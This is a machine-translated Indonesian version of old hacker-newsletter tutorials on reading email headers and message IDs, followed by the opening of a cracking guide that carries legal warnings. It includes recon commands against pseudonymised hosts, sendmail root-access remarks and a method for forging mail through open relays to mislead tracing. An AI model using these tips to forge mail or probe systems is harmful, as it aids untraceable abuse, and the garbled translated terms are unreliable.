Informasi dalam tajuk apa pun terdiri dari serangkaian bidang yang dipisahkan satu sama lain oleh “baris baru”
karakter. Setiap bidang terdiri dari dua bagian: nama bidang, yang tidak menyertakan spasi dan diakhiri oleh a
usus besar; dan isi kolom. Dalam hal ini, satu-satunya bidang yang menampilkan adalah "Dari :," "Tanggal :," dan "Ke:".
Di setiap tajuk ada dua kelas bidang: "amplop," yang hanya berisi pengirim dan penerima
bidang; dan yang lainnya, yang merupakan informasi khusus untuk penanganan pesan. Dalam hal ini
hanya bidang yang menunjukkan yang memberikan informasi tentang penanganan pesan adalah bidang Tanggal.
Saat kami memperluas ke tajuk lengkap, kami dapat melihat semua bidang tajuk. Kami sekarang akan melalui ini
informasi baris demi baris.
Diterima: oleh o200.fooway.net (950413.SGI.8.6.12 / 951211.SGI) untuk techbr@fooway.net id OAA07210; Jumat, 11
Apr 1997 14:10:06 -0400
Baris ini memberi tahu kami bahwa saya mengunduh email ini dari server POP di komputer bernama o200.fooway.net.
Ini dilakukan atas nama akun saya dengan alamat email techbr@fooway.net. Itu
(950413.SGI.8.6.12 / 951211.SGI) mengidentifikasi bagian nama perangkat lunak dan versi yang menjalankan server POP itu.
******************************************

Halaman 177
Catatan pemula: POP adalah singkatan dari Post Office Protocol. Server POP Anda adalah komputer yang menyimpan email
Anda
sampai kamu mau membacanya. Biasanya program email Anda di komputer rumah Anda atau komputer akun shell
akan terhubung ke port 110 di server POP Anda untuk mendapatkan email Anda.
Protokol serupa, tetapi lebih umum adalah IMAP, untuk Protokol Akses Surat Interaktif. Percayalah, Anda akan menjadi
sukses besar di pesta-pesta jika Anda bisa bertahan pada perbedaan antara POP dan IMAP, Anda seorang hacker besar,
kamu! (Petunjuk: untuk info lebih lanjut, RTFRFC.)
******************************************
Sekarang kita periksa baris kedua dari header:
Diterima: dari ifi.foobar.no oleh o200.fooway.net via ESMTP (950413.SGI.8.6.12 / 951211.SGI) untuk
<hacker@techbroker.com> id OAA18967; Jumat, 11 Apr 1997 14:09:58 -0400
Ya ampun, saya tidak berjanji bahwa tajuk ini akan * benar-benar * biasa saja. Baris ini memberitahu kita bahwa komputer
bernama ifi.foobar.no meneruskan email ini ke server POP di o200.fooway.net untuk seseorang yang memiliki email tersebut
alamat hacker@techbroker.com. Ini karena saya mengirim semua email ke hacker@techbroker.com ke dalam
akun techbr@fooway.net. Di bawah Unix ini dilakukan dengan mengatur file di direktori home Anda bernama
“.Forward” dengan alamat tujuan pengiriman email Anda. Sekarang ada banyak lagi di balik ini, tapi saya
tidak memberitahumu. Heh, heh. Adakah di antara kalian yang genius jahat di luar sana yang bisa mengetahui keseluruhan
cerita?
"ESMTP" adalah singkatan dari "extended extended transfer protocol." The "950413.SGI.8.6.12 / 951211.SGI"
menunjuk program yang menangani email saya.
Sekarang untuk baris berikutnya di header:
Diterima: dari gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) oleh ifi.foobar.no dengan ESMTP
(8.6.11 / ifi2.4) id <UAA24351 @ ifi.foobar.no> untuk <hacker@techbroker.com>; Jumat, 11 Apr 1997 20:09:56 +200
Baris ini memberi tahu kita bahwa komputer ifi.foobar.no mendapat pesan email ini dari komputer gyllir.ifi.foobar.no.
Kedua komputer ini tampaknya berada pada LAN yang sama. Padahal, perhatikan sesuatu yang menarik. Komputer
nama gyllir.ifi.foobar.no memiliki nomor setelahnya, 129.xxx.64.230. Ini adalah representasi numerik dari namanya.
(Saya mengganti ".xxx." Untuk tiga angka untuk fubar alamat IP.) Tetapi komputer ifi.foobar.no
tidak memiliki nomor setelah namanya. Bagaimana bisa?
Sekarang jika Anda bekerja dengan Windows 95 atau Mac Anda mungkin tidak dapat menemukan misteri kecil ini. Tapi
percayalah, peretasan adalah tentang memperhatikan misteri kecil ini dan menyelidikinya (sampai Anda menemukan sesuatu
untuk itu)
istirahat, muhahaha - hanya bercanda, OK?)
Tapi karena saya mencoba menjadi peretas sejati, saya pergi ke akun shell Unix saya yang terpercaya dan memberikan perintah:
> nslookup ifi.foobar.no
Server: Fubarino.com
Alamat: 198.6.71.10
Jawaban tidak resmi:
Nama: ifi.foobar.no
Alamat: 129.xxx.64.2
Perhatikan alamat IP numerik yang berbeda antara ifi.foobar.no dan gyllir.ifi.foobar.no. Hmmm, saya mulai
berpikir bahwa domain ifi.foobar.no mungkin merupakan masalah yang cukup besar. Menyelidiki sekitar dengan menggali dan
traceroute menuntun saya
untuk menemukan lebih banyak komputer di domain itu. Memeriksa dengan nslookup dalam mode “set type = any” memberitahu
saya
lebih dari itu.

Halaman 178
Katakan, apa artinya “.tidak” itu? Sekilas tentang Organisasi Standar Internasional (ISO)
catatan singkatan negara, saya melihat "tidak" singkatan Norwegia. Aha, sepertinya Norwegia adalah tanah Arktik
fjord, pegunungan, rusa, dan banyak dan banyak host Internet. Pencarian cepat milis untuk
Happy Hacker mengungkapkan bahwa sekitar 5% dari hampir 4.000 alamat emailnya memiliki domain .no. Jadi sekarang kita
tahu bahwa negeri matahari tengah malam ini juga merupakan sarang peretas! Siapa bilang header membosankan?
Ke baris berikutnya, yang memiliki nama dan alamat email pengirim:
Dari: Vegbar Fubar <fooha@ifi.foobar.no>
Diterima: dari localhost (Vegbarha @ localhost) oleh gyllir.ifi.foobar.no; Jumat, 11 Apr 1997 18:09:53 GMT
Saya akan menebak-nebak di sini. Baris ini mengatakan komputer gyllir.ifi.foobar.no mendapat pesan email ini
dari Vegbar Fubar di komputer "localhost." Sekarang "localhost" adalah apa yang disebut komputer Unix sendiri. Sementara
di shell Unix, coba perintah "telnet localhost." Anda akan mendapatkan urutan login yang membuat Anda segera kembali
akun kamu sendiri.
Jadi ketika saya melihat bahwa gyllir.ifi.foobar.no mendapat pesan email dari "localhost" saya menganggap itu berarti
pengirim email ini telah masuk ke akun shell di gyllir.ifi.foobar.no, dan komputer ini menjalankan Unix.
Saya dengan cepat menguji hipotesis ini:
> telnet gyllir.ifi.foobar.no
Mencoba 129.xxx.64.230 ...
Terhubung ke gyllir.ifi.foobar.no.
Karakter melarikan diri adalah '^]'.
Sistem IRIX V.4 (gyllir.ifi.foobar.no)
Sekarang Irix adalah sistem operasi Unix untuk mesin Silicon Graphics Inc. (SGI). Ini cocok dengan nama
perangkat lunak server POP di ifi.foobar.no di header (950413.SGI.8.6.12 / 951211.SGI). Jadi, wow, benar
melihat jaringan besar komputer Norwegia yang mencakup kotak SGI. Kita bisa mencari tahu caranya
banyak kotak SGI dengan kesabaran, pemindaian alamat IP tetangga, dan penggunaan penggalian dan nslookup Unix
perintah.
Sekarang Anda tidak melihat kotak SGI setiap hari di Internet. Komputer SGI dioptimalkan untuk grafis dan
komputasi ilmiah.
Jadi saya sangat tergoda untuk mempelajari lebih lanjut tentang domain ini. Seringkali ISP akan memiliki halaman Web yang
ditemukan
dengan mengarahkan browser Anda ke nama domainnya. Jadi saya mencoba http://ifi.foobar.no. Tidak berhasil, jadi saya coba
http://www.ifi.foobar.no. Saya mendapatkan halaman beranda untuk Universitas Oslo Institutt for Informatikk. Itu
Divisi informatikk memiliki kekuatan dalam ilmu komputer dan pemrosesan gambar. Sekarang bertanya-tanya orang dengan
ifi.foobar.no bisa menggunakan komputer SGI.
Selanjutnya saya memeriksa www.foobar.no dan mengetahui bahwa Universitas Oslo memiliki 39.000 mahasiswa. Tidak heran
kita
temukan begitu banyak komputer host Internet di bawah domain ifi.foobar.no!
Tapi mari kita kembali ke tajuk ini. Baris berikutnya cukup sederhana, cukup tanggal:
Tanggal: Jum, 11 Apr 1997 18:09:53 GMT
Namun kini hadir baris paling menarik dari semua di header, ID pesan:
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>

Halaman 179
ID pesan adalah kunci untuk melacak email palsu. Menghindari pembuatan ID pesan yang valid adalah
kunci untuk menggunakan email untuk tujuan kriminal. Penjahat komputer melakukan banyak upaya untuk menemukan host
Internet
untuk memalsukan email yang tidak meninggalkan jejak aktivitas mereka melalui ID pesan ini.
Bagian pertama dari ID ini adalah tanggal dan waktu. 199704111809 berarti 1997, 11 April 18:08 (atau 18:08). Beberapa
ID pesan juga termasuk waktu dalam detik. Yang lain mungkin meninggalkan "19" dari tahun itu. 13156 adalah a
nomor yang mengidentifikasi siapa yang menulis email, dan gyllir@ifi.foobar.no mengacu pada komputer, gyllir di dalam
domain ifi.foobar.no, di mana catatan ini disimpan.
Di mana di komputer ini adalah catatan identitas pengirim email yang disimpan? Sekarang Unix punya banyak
varian, jadi saya tidak akan berjanji catatan ini akan berada di file dengan nama yang sama di setiap kotak Unix. Tapi
seringkali mereka berada di file syslog atau usr / spool / mqueue. Beberapa sysadmin akan mengarsipkan pesan
ID jika mereka perlu mencari tahu siapa yang mungkin telah menyalahgunakan sistem email mereka. Tetapi pengaturan default
untuk
beberapa sistem, misalnya yang menggunakan sendmail, adalah untuk tidak mengarsipkan. Sayangnya, tuan rumah Internet itu
tidak mengarsipkan ID pesan ini untuk menciptakan surga potensial bagi penjahat email.
Sekarang kita akan meninggalkan Universitas Norwegia dan beralih ke header yang menyembunyikan kejutan.
Diterima: dari NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) oleh Fubarino.com (8.8.3 / 8.6.9) dengan ESMTP
id XAA20854 untuk <galfina@Fubarino.com>; Sun, 27 Apr 1997 23:07:01 GMT
Diterima: dari CISPPP - 199.xxx.193.176 oleh csi.com dengan Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -
0400
Message-Id: <2.2.16.19970428082132.2cdf544e@fubar.com>
X-Pengirim: cmeinel@fubar.com
X-Mailer: Windows Eudora Pro Versi 2.2 (16)
Mime -Versi: 1.0
Jenis-Konten: teks / polos; charset = "us-ascii"
Kepada: galfina@Fubarino.com
Dari: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subjek: Contoh tajuk
Tanggal: 27 Apr 1997 22:53:37 -0400
Mari kita lihat baris pertama:
Diterima: dari NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) oleh Fubarino.com (8.8.3 / 8.6.9) dengan ESMTP
id XAA20854 untuk <galfina@Fubarino.com>; Sun, 27 Apr 1997 23:07:01 GMT
Baris pertama ini memberitahu kita bahwa itu diterima oleh akun email "galfina@Fubarino.com". Itulah “untuk
<galfina@Fubarino.com> “bagian. Komputer host Internet yang mengirim email ke galfina adalah
mail6.foo1.csi.com [149.xxx.183.75]. Nama komputer ini diberikan pertama kali dalam bentuk yang mudah (ha, hah!) Dibaca
oleh
manusia diikuti oleh versi namanya bahwa komputer dapat lebih mudah diterjemahkan ke dalam angka 0 dan 1
bahwa komputer mengerti.
"Galfina" adalah nama pengguna saya. Saya memilihnya untuk mengganggu GALF (Front Pembebasan Area Gray).
“Fubarino.com (8.8.3 / 8.6.9)” adalah nama komputer yang menerima email untuk akun galfina saya. Tapi
perhatikan itu adalah nama komputer yang sangat parsial. Yang kami dapatkan hanyalah nama domain dan bukan nama
komputernya
yang saya unduh email saya. Kita dapat menebak bahwa Fubarino.com bukan nama lengkap karena Fubarino adalah nama besar
cukup ISP untuk memiliki beberapa komputer di LAN untuk melayani semua penggunanya.
************************************************
Kiat jenius jahat: Ingin mengetahui nama-nama beberapa komputer di LAN ISP Anda? Memerintahkan itu
dapat mengeruk beberapa dari mereka termasuk perintah Unix traceroute, menggali, dan siapa.

Halaman 180
Sebagai contoh, saya menjelajahi LAN Fubarino.com dan menemukan free.Fubarino.com (dari perintah “dig
Fubarino.com ”); dan kemudian dialin.Fubarino.com dan milnet.Fubarino.com (dari "siapa" yang diberikan saat masuk
akun galfina saya)
Kemudian gunakan alamat numerik yang diberikan dari perintah gali dengan nama-nama Fubarino.com ini
komputer saya kemudian dapat, dengan memeriksa nomor terdekat, untuk menemukan sejumlah besar nama
Komputer Fubarino.com.
************************************************
Nomor setelah Fubarino.com bukan alamat IP numerik. Ini adalah penunjukan versi surat
program itu berjalan. Kita bisa menebak dari angka-angka ini 8.8.3 / 8.6.9 yang merujuk pada program Sendmail. Tapi adil
untuk memastikan, kami mencoba perintah "telnet Fubarino.com 25." Ini memberi kita jawabannya:
220 Fubarino.com ESMTP Sendmail 8.8.3 / 8.6.9 siap pada Senin, 28 Apr 1997 09:55:58 GMT
Jadi dari sini kita tahu Fubarino.com menjalankan program Sendmail.
************************************************
Kiat jenius jahat: Sendmail terkenal karena kekurangan yang dapat Anda gunakan untuk mendapatkan akses root ke komputer.
Bahkan demikian
meskipun Fubarino.com menggunakan versi sendmail yang telah diperbaiki dari yang terakhir dipublikasikan
lubang keamanan, jika Anda sabar eksploitasi baru hampir pasti akan keluar dalam beberapa bulan ke depan. Itu
obat untuk masalah ini mungkin menjalankan qmail, yang sejauh ini tidak memiliki masalah yang memalukan.
************************************************
OK, sekarang mari kita lihat baris "diterima" berikutnya di header itu:
Diterima: dari CISPPP - 199.xxx.193.176 oleh csi.com dengan Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -
0400
CISPPP adalah kependekan dari Compuserve Information Services point to point protocol (PPP) connection. Ini berarti
bahwa surat itu dikirim dari koneksi PPP yang saya atur melalui Compuserve. Kami juga melihat Compuserve itu
menggunakan program surat Microsoft SMTPSVC.
Namun, kami melihat dari sisa tajuk bahwa pengirim (saya) tidak menggunakan surat standar Compuserve
antarmuka:
Message-Id: <2.2.16.19970428082132.2cdf544e@fubaretta.com>
Angka 2.2.16. dimasukkan oleh Eudora, dan berarti saya menggunakan Eudora Pro 2.2, versi 16-bit. Itu
19970428082132 berarti waktu saya mengirim email, sesuai urutan tahun (1997), bulan (04), hari (28) dan waktu
(08:31:32).
Bagian dari ID pesan “2cdf544e@fubaretta.com” adalah bagian yang paling penting. Itu disediakan oleh
host Internet tempat catatan penggunaan server email fubaretta saya disimpan.
Apakah Anda memperhatikan ID pesan ini tidak disimpan dengan Compuserve, tetapi dengan fubaretta.com? Ini adalah,
pertama-tama, karena ID pesan dibuat dengan server POP yang saya tentukan dengan Eudora. Sejak
Compuserve belum menawarkan server POP, saya hanya bisa menggunakan Eudora untuk mengirim email melalui Compuserve
koneksi tetapi tidak menerima email Compuserve. Jadi, heck, saya dapat menentukan server POP sembarang ketika saya
mengirim
email melalui Compuserve dari Eudora. Saya memilih ISP Fubaretta. Jadi disana!
Jika saya telah melakukan sesuatu berita buruk dengan email itu seperti spamming, pemerasan atau pemboman email,
sysadmin di fubaretta.com akan mencari ID pesan itu dan mencari informasi yang menghubungkan email itu dengan saya
Akun compuserve. Itu mengasumsikan, tentu saja, bahwa fubaretta.com adalah pengarsipan ID pesan.

Halaman 181
Jadi, ketika Anda membaca bagian dari tajuk ini, Anda mungkin berpikir bahwa komputer tempat saya mengambil surel
ISP Fubaretta.com. Tapi semua ini benar-benar berarti bahwa saya menentukan untuk Eudora bahwa saya menggunakan akun
email
di Fubar. Tetapi jika saya meletakkan nama akun yang berbeda di sana, maka saya akan menghasilkan pesan yang berbeda
ID.
Apakah saya perlu memiliki akun di Fubaretta? Tidak. Server surat tidak meminta kata sandi. Sebenarnya saya tidak
punya akun di Fubaretta.
Sisa header adalah informasi yang diberikan oleh Eudora:
X-Pengirim: cmeinel@fubar.com
X-Mailer: Windows Eudora Pro Versi 2.2 (16)
Mime -Versi: 1.0
Jenis-Konten: teks / polos; charset = "us-ascii"
Informasi "X-Mailer" memberi tahu Anda bahwa saya menggunakan versi 16 bit Windows Eudora Pro Versi 2.2.
Beberapa orang bertanya kepada saya mengapa saya tidak menggunakan versi 32 bit (yang berjalan pada Win 95) alih-alih 16 bit
versi. Jawaban: penanganan kesalahan yang lebih baik! Itu alasan yang sama saya biasanya tidak menggunakan Pegasus. Juga,
Eudora
biarkan aku pergi dengan bodoh :)
Mime (Extensipose Internet Mail Extensions) adalah protokol untuk melihat email. Anda yang punya banyak
sampah ketika saya mengirim GTMHH dan Digest dapat menyalahkannya pada Mime. Jika program email Anda tidak
menggunakan Mime,
Anda mendapatkan banyak hal seperti “= 92” alih-alih apa yang saya coba kirim. Tapi kali ini saya mematikan "dicetak
fitur quotable ”di Eudora. Jadi kali ini saya harap saya mengirim kalian semua, ASCII yang ramah dan bersahabat. Silakan email
saya jika
apa yang Anda dapatkan masih kacau, oke?
Set karakter "us-ascii" memberi tahu kami set karakter apa yang akan digunakan email ini. Beberapa email menggunakan ISO
ascii sebagai gantinya,
umumnya jika berasal dari luar AS.
Sekarang mari kita lihat header yang sedikit lebih menarik. Sebenarnya, ini adalah header muhahaha asli. Ingat bahwa
perang yang saya nyatakan di situs Web yang menyediakan unduhan program pemboman email? Anda tahu itu
Windows 95 untuk program lusers yang berjalan dari beberapa klik mouse? Inilah tajuk yang mengungkapkan mungil saya
kontribusi untuk membuat hidup tidak menyenangkan bagi ISP yang mendistribusikan program-program ini. Ini dari Happy
Hacker Digest, 12 April 1997, dari salinan yang mencapai alamat email percobaan yang saya miliki dalam daftar:
Diterima: oleh o200.fooway.net (950413.SGI.8.6.12 / 951211.SGI) untuk techbr@fooway.net id MAA07059; Senin
14 Apr 1997 12:05:25 -0400
Tanggal: Senin, 14 Apr 1997 12:05:22 -0400
Diterima: dari mocha.icefubarnet.com oleh o200.fooway.net via ESMTP (950413.SGI.8.6.12 / 951211.SGI) untuk
<pettit@techbroker.com> id MAA06380; Senin, 14 Apr 1997 12:05:20 -0400
Diterima: dari cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) oleh mocha.icefubarnet.com
(Netscape Mail Server v2.01) dengan SMTP id AAP3428; Senin, 14 Apr 1997 08:51:02 -0700
Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>
X-Pengirim: techbr@mail.fooway.net (Tidak Diverifikasi)
X-Mailer: Windows Eudora Pro Versi 2.2 (16)
Mime -Versi: 1.0
Jenis-Konten: teks / polos; charset = "iso-8859-1"
Kepada: (Daftar penerima ditekan)
Dari: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subjek: Happy Hacker Digest 12 April 1997
Sekarang mari kita periksa bidang pertama:

Halaman 182
Diterima: oleh o200.fooway.net (950413.SGI.8.6.12 / 951211.SGI) untuk techbr@fooway.net id MAA07059; Senin
14 Apr 1997 12:05:25 -0400
Tanggal: Senin, 14 Apr 1997 12:05:22 -0400
Kami sudah melihat komputer ini o200.fooway.net di atas. Tapi, mari, kita selidiki sedikit lebih dalam. Sejak
Saya menduga ini adalah server POP, saya akan telnet ke port 110, yang biasanya port server POP.
> telnet o200.fooway.net 110
Mencoba 207.xxx.192.57 ...
Terhubung ke o200.fooway.net.
Karakter melarikan diri adalah '^]'.
+ OK QUALCOMM Server pop berasal dari UCB (versi 2.1.4-R3) saat memulai surat.
Sekarang kita tahu lebih banyak tentang server POP Fooway Technology. Jika Anda pernah menjalankan salah satu peretas itu
"Strobo" ketik program yang memberi tahu Anda program apa yang berjalan di setiap port komputer, sebenarnya ada
bukan masalah besar untuk itu. Mereka hanya mengotomatiskan proses yang kami lakukan di sini dengan tangan. Tapi menurut
saya
Anda akan belajar lebih banyak dengan menyalakan port dengan tangan seperti yang saya lakukan di sini.
Sekarang kita bisa melakukan lebih banyak nyala, tetapi saya mulai bosan. Jadi kami memeriksa bidang kedua di tajuk ini:
Tanggal: Senin, 14 Apr 1997 12:05:22 -0400
-0400 itu adalah koreksi waktu. Tetapi untuk apa mengoreksi? Mari kita lihat bidang selanjutnya di header:
Diterima: dari mocha.icefubarnet.com oleh o200.fooway.net via ESMTP (950413.SGI.8.6.12 / 951211.SGI) untuk
<hacker@techbroker.com> id MAA06380; Senin, 14 Apr 1997 12:05:20 -0400
Hmmm, mengapa mocha.icefubarnet.com ada di header? Jika tajuk ini tidak dipalsukan, artinya server email ini tadinya
menangani mailing Happy Hacker Digest. Jadi di mana mocha.icefubarnet.com berada? Penggunaan cepat dari
perintah whois memberitahu kita:
> whois icefubarnet.com
ICEFUBARNET INTERNET, INC (ICEFUBARNET-DOM)
2178 Fooway
North Bar, Oregon 97xxx
Amerika Serikat
Sekarang ini terletak empat zona waktu lebih awal dari komputer o200.fooway.net. Jadi ini menjelaskan waktunya
notasi koreksi -0400.
Bidang selanjutnya di tajuk memberi tahu kami:
Diterima: dari cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) oleh mocha.icefubarnet.com
(Netscape Mail Server v2.01) dengan SMTP id AAP3428; Senin, 14 Apr 1997 08:51:02 -0700
Ini memberitahu kita bahwa Happy Hacker Digest dikirim ke server mail (SMTP singkatan dari surat sederhana
protokol transport) di mocha.icefubarnet.com oleh Compuserve. Tapi, dan ini sangat penting untuk diperhatikan,
sekali lagi saya tidak menggunakan sistem email Compuserve. Ini hanya mewakili sesi PPP yang saya atur
Compuserve. Bagaimana kamu bisa tahu? Bermain dengan nslookup menunjukkan bahwa representasi numerik saya
Koneksi compuserve bukan host Internet. Tetapi Anda tidak dapat belajar lebih mudah karena Compuserve
memiliki keamanan yang hebat - satu alasan saya menggunakannya. Tapi terima kata-kata saya untuk itu, ini adalah cara lain
untuk melihat Compuserve
Sesi PPP di header.
Sekarang kita sampai ke masalah besar, ID pesan:

Halaman 183
Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net>
Wah, kenapa ID itu ada di komputer mail.fooway.net? Sederhana saja. Di Eudora saya tentukan
Server POP sebagai mail.fooway.net. Tetapi jika Anda harus melakukan sedikit stobing, Anda akan menemukan itu sementara
fooway.net memiliki server POP, tidak memiliki server SMTP atau ESMTP. Anda bisa mendapatkan email dari Fooway,
tetapi Anda tidak dapat mengirim barang dari Fooway. Tetapi cara kerja Internet yang luar biasa dikombinasikan dengan
naif program Eudora Pro 2.2 mengirim ID pesan saya ke mail.fooway.net.
Pada ID pesan, "2.2.16" dimasukkan oleh Eudora. Itu menandakan itu adalah versi 2.2 untuk 16 bit
sistem operasi.
Semua kolom header yang tersisa disisipkan oleh Eudora:
X-Pengirim: techbr@mail.fooway.net (Tidak Diverifikasi)
X-Mailer: Windows Eudora Pro Versi 2.2 (16)
Mime -Versi: 1.0
Jenis-Konten: teks / polos; charset = "iso-8859-1"
Kepada: (Daftar penerima ditekan)
Dari: "Carolyn P. Meinel" <cmeinel@techbroker.com>
Subjek: Happy Hacker Digest 12 April 1997
Perhatikan Eudora memang memberi tahu kami bahwa techbr@mail.fooway.net tidak diverifikasi sebagai pengirim. Dan
faktanya, itu
pasti bukan pengirimnya. Ini adalah fakta yang sangat penting. ID pesan dari suatu email belum tentu
disimpan dengan komputer yang mengirimnya.
Jadi bagaimana saya bisa menggunakan server mail Icefubarnet Internet untuk mengirimkan Happy Hacker Digest?
Untungnya kenaifan Eudora memudahkan saya untuk menggunakan server surat yang memiliki SMTP terbuka atau ESMTP
Pelabuhan. Anda mungkin terkejut mendapati bahwa ada server surat Internet yang tidak terhitung yang dapat Anda gunakan
dengan mudah
komandan untuk mengirim email Anda - jika Anda memiliki program yang tepat - atau jika Anda tahu cara telnet ke port 25
(yang berjalan menggunakan protokol SMTP atau ESMTP) dan berikan perintah untuk mengirim email sendiri.
Mengapa saya menggunakan Icefubarnet? Karena pada saat itu hosting situs ftp yang sedang digunakan untuk mengunduh
program bomber email (http://www.icefubarnet.com/~astorm/uy4beta1.zip). Terakhir kali saya memeriksa pemiliknya
dari akun dari mana ia menawarkan barang-barang jelek ini tidak bahagia karena Icefubarnet Internet memilikinya
membuatnya turun.
Tapi - kembali ke cara memerintah server surat saat mengirim Id pesan Anda di tempat lain. Di Eudora, adil
tentukan server surat korban Anda di bawah bagian host dari menu opsi (di bawah alat). Kemudian tentukan
komputer tempat Anda ingin mengirim ID pesan Anda di bawah "Server POP."
Tetapi jika Anda mencoba salah satu dari bisnis monyet ini dengan Pegasus, itu memberikan pesan kesalahan buruk yang
menuduh Anda
mencoba memalsukan email.
Tentu saja Anda selalu dapat memerintah server surat dengan menulis program Anda sendiri ke surat komandan
server. Tapi itu akan dibahas dalam GTMHH mendatang tentang pemrograman shell.
*******************************************
Catatan pemula: Pemrograman shell? Apa sih izzat? Itu berarti menulis sebuah program yang menggunakan urutan
perintah yang tersedia untuk Anda di shell Unix Anda. Jika Anda ingin menjadi peretas sejati, Anda * harus * belajar Unix! Jika
kamu
serius untuk terus mempelajari GTMHH ini, Anda * harus * mendapatkan akun shell atau menginstal beberapa
bentuk Unix di komputer di rumah Anda. Anda dapat menemukan tempat di mana Anda dapat mendaftar untuk akun shell
melalui http://www.celestin.com/pocia/. Atau email haxorshell@techbroker.com untuk informasi tentang cara melakukannya

Halaman 184
mendaftar dengan akun shell yang bersahabat dengan peretas dan Anda dapat melakukan telnet dengan aman dari lokal Anda
Dialup ISP PPP.
*******************************************
Tunggu, aktif, Vol. 3 Nomor 5 akan masuk ke hal-hal yang benar-benar berbulu: bagaimana melakukan penguraian maju dari
palsu
header. Ya, bagaimana cara menangkap 31137 d00d yang mengirim email kepada Anda atau mem-spam Anda!
Selamat Hacking, dan jadilah baik!
___________________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 3 No. 5
Dread GTMHH tentang Cracking
____________________________________________________________
Saat ini jika Anda bertanya kepada siapa saja apa itu hacker, dia akan memberi tahu Anda “seseorang yang menerobos masuk
komputer. "
Itu sebagian karena cerita berita yang membuatnya tampak seperti satu-satunya hal yang dilakukan oleh seorang hacker
kejahatan komputer. Tetapi ada juga beberapa kebenaran di mata publik. Obsesi membobol komputer
telah menyapu dunia peretas. Sebenarnya, banyak peretas mengolok-olok hal-hal yang menurut saya menyenangkan:
memalsukan email
dan posting Usenet dan pemrograman telur Paskah ke dalam perangkat lunak komersial dan membuat Win 95 bootup
layar yang mengatakan "ibu Bill Gates memakai sepatu bot tentara."
Tetapi karena semua orang dan saudara lelakinya telah mengirim email kepada saya memohon instruksi tentang cara masuk
komputer, ini dia. GTMHH yang takut pada Cracking. Ya, Anda juga bisa menjadi komputer asli
cracker dan membuat semua orang gempa dengan sepatu bot atau sandal atau alas kaki apa pun yang mereka kenakan
belakangan ini.
"Tapi, tapi," katamu. "Daftar ini untuk * peretasan * legal. Sez di sini, di pesan selamat datang yang Anda kirimkan kepada saya
ketika saya mendaftar. "
Selamat datang di kenyataan, Bub. Kadang-kadang peretas melakukan kesalahan.
**********************************************
Anda bisa masuk penjara peringatan: Hampir di mana-mana di planet ini, membobol komputer adalah ilegal. Satu-satunya
pengecualian masuk ke komputer Anda sendiri, atau masuk ke komputer yang pemiliknya telah berikan kepada Anda
izin untuk mencoba masuk. Tidak masalah jika Anda hanya diam-diam menyelinap tanpa membahayakan. Saya t
tidak masalah jika Anda membuat komputer orang asing menjadi lebih baik. Anda masih dalam masalah jika Anda menerobos
masuk
izin.
**********************************************
Jujur, Panduan ini * sebenarnya * tentang peretasan yang tidak berbahaya. Anda tidak perlu melakukan kejahatan untuk menjebol
komputer. Dari waktu ke waktu jiwa yang keras menawarkan komputer mereka untuk teman-teman mereka, atau kadang-kadang
bahkan komputer
seluruh dunia, sebagai target untuk cracking. Jika Anda memiliki izin dari pemilik komputer, itu yang paling
pasti legal untuk membobolnya.
Bahkan, inilah komputer yang benar-benar menyenangkan yang Anda miliki izin untuk membobolnya. Damien Sorder
mengundang Anda untuk melakukannya
masuk ke komputer host Internet-nya obscure.sekurity.org.

Halaman 185
Tapi bagaimana Anda tahu apakah pengumuman ini atau apa pun dari tikar selamat datang cracker adalah sah? Bagaimana
Tahukah Anda, saya tidak hanya mempermainkan Damien dengan mengirimkan undangan untuk menerimanya
kotak ke 5.000 pembaca gila daftar Happy Hacker?
Berikut cara yang baik untuk memeriksa validitas penawaran agar siapa pun mencoba masuk ke komputer. Dapatkan domainnya
nama komputer target, dalam hal ini obscure.sekurity.org. Kemudian tambahkan "root @" ke nama domain, untuk
contoh root@obscure.sekurity.org. Kirim email ke pemilik komputer itu. Tanyakan padanya apakah saya berbohong tentang itu
menawarkan. Jika dia mengatakan saya mengada-ada, katakan padanya dia hanya ayam, bahwa jika dia adalah peretas sejati dia
akan senang memilikinya
ribuan pemula yang tidak mengerti menjalankan Setan terhadap kotaknya. Hanya bercanda:)
Sebenarnya, dalam hal ini Anda dapat mengirim email info@sekurity.org untuk rincian lebih lanjut tentang tawaran Damien
untuk membiarkan semuanya
mencoba memecahkan kotaknya. Selain itu, harap jadilah orang baik dan serang waktu (Mountain Daylight Savings Time, AS)
jadi dia bisa menggunakan obscure.sekurity.org untuk hal-hal lain di siang hari.
Juga, Damien meminta “Jika Anda (atau siapa pun) ingin mencoba meretas yang tidak jelas, silakan kirim root@sekurity.org dan
menyebutkan bahwa Anda melakukannya, dan dari mana Anda berasal. Dengan begitu saya bisa membedakan
serangan yang sah dan nyata. "
Kami semua berterima kasih kepada Anda, Damien, karena memberikan target hukum bagi para pembaca GTMHH ini untuk
menguji mereka
keterampilan retak.
Jadi mari kita asumsikan bahwa Anda telah memilih komputer target yang sah untuk mencoba menerobos. Apa? Beberapa orang
katakanlah terlalu sulit untuk masuk ke dalam kotak berbenteng seperti obscure.sekurity.org? Mereka mengatakan lebih
menyenangkan untuk menerobos masuk
komputer ketika mereka melanggar hukum? Mereka mengatakan untuk menjadi Peretas yang sesungguhnya, Anda harus
berlarian ke tempat sampah
kotak-kotak massa ngeri host Internet? Haw, haw, sendmail 4.0! Mereka seperti apa, kata mereka. Mereka yakin
mengajarkan sendmail 4.0 itu dudes pelajaran, kan?
Saya mengatakan bahwa cracker yang mencari komputer yang rentan dan membobolnya adalah seperti Lounge
Lizard Larry pergi ke bar dan mengambil gal (atau cowok) yang mabuk, paling jelek di tempat itu. Ya, kita semua
tentu terkesan.
Namun, jika Anda ingin menjadi cracker yang benar-benar elit, Anda akan membatasi peluncuran Anda ke komputer yang
pemiliknya
menyetujui eksplorasi Anda. Ini bisa - harus! - termasuk komputer Anda sendiri.
